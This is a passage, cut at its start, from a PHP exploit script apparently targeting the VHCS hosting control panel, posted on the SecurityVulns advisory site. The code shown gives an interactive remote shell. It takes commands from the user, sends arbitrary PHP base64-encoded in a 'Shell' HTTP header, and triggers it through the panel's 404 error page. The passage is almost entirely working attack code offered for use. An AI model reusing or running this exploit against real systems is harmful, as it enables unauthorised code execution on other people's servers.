               $this->msg('[email protected]'.$this->usr.': ', 1);
               $this->cmd = trim(fgets(STDIN));

               if(!ereg('^(quit|exit)$', $this->cmd))
                  return TRUE;

               else
                  return FALSE;
       }

       function exec_php($php)
       {
               $this->addheader('Shell', base64_encode($php));
               $this->get($this->dmn_url.'/errors/404/index.
php');

               return;
       }

       function msg($msg, $flag, $action=0)
       {
               print "\n ".$this->flags[$flag]."\x20".$msg;

               switch($action)
               {
                       case 1:
                               print "\n";
                               return $this->usage();
                       break;

                       case 2:
                               print "\n";
                               exit(1);
                       break;
               }
       }
}

$spl = new vhcs_xpl;
$spl->main();

?>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород